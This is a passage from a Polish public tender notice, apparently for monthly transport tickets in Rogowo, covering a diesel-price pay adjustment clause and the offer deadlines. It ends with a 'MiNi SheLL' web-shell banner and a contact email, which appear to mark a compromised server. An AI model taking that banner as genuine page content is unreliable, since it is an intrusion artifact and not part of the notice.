jakichkolwiek<br/>zmian umowy.<br/>b) Jeżeli w czasie trwania umowy hurtowe ceny netto oleju napędowego publikowane<br/>na stronie Internetowej www.orlen.pl zmieniają się o co najmniej 30% względem<br/>hurtowej ceny oleju napędowego netto przyjętej w dniu składania oferty, każda ze Stron ma prawo wystąpić do drugiej Strony z wnioskiem o zmianę wynagrodzeniaza zakupywane bilety miesięczne. Strona żądająca zmiany wynagrodzenia na tej<br/>podstawie przedłoży dowody na wpływ zmiany cen oleju napędowego na ceny<br/>biletów miesięcznych.<br/>c) W terminie do 10 dni roboczych od dnia przekazania wniosku o zmianę<br/>wynagrodzenia z powodów, o których mowa w ust. 2, Strona, która otrzymała<br/>wniosek, przekaże drugiej Stronie informację o zakresie, w jakim zatwierdza<br/>wniosek oraz wskaże kwotę, o którą wynagrodzenie należne Wykonawcy powinno<br/>ulec zmianie, albo informację o niezatwierdzeniu wniosku wraz z uzasadnieniem.<br/>d) Strona, która otrzymała wniosek o zmianę wynagrodzenia na podstawie ust. 2 może<br/>wnieść, w terminie nie dłuższym niż 7 dni roboczych zastrzeżenia do wyliczenia, o<br/>których mowa w ust. 3, do których Strona wnioskująca o zmianę powinna<br/>ustosunkować się w terminie 7 dni roboczych od dnia przekazania jej uwag.<br/>e) W razie sporu Stron co do wysokości wynagrodzenia, Strony mogą powołać<br/>niezależnego rzeczoznawcę, który dokona wyceny proponowanych zmian. Koszt<br/>wynagrodzenia rzeczoznawcy ponoszą Strony w równych częściach.<br/>f) Zmiana minimalnego wynagrodzenia nie może być podstawą do żądania zmiany<br/>wynagrodzenia za bilety miesięczne.<br/>g) W przypadku akceptacji wniosku o zmianę wynagrodzenia zawarcie aneksu nastąpi<br/>nie później niż w terminie 10 dni roboczych od dnia zatwierdzenia wniosku o<br/>dokonanie zmiany wysokości wynagrodzenia należnego Wykonawcy. Nowe<br/>wynagrodzenie będzie obowiązywało od pierwszego dnia miesiąca następującego po<br/>dacie zawarcia aneksu.<br/>h) Maksymalna wartość zmiany wynagrodzenia, związana z okolicznościami, o których<br/>mowa w pkt. 6 wynosi 30% pierwotnej wartości zamówieni <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/rogowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com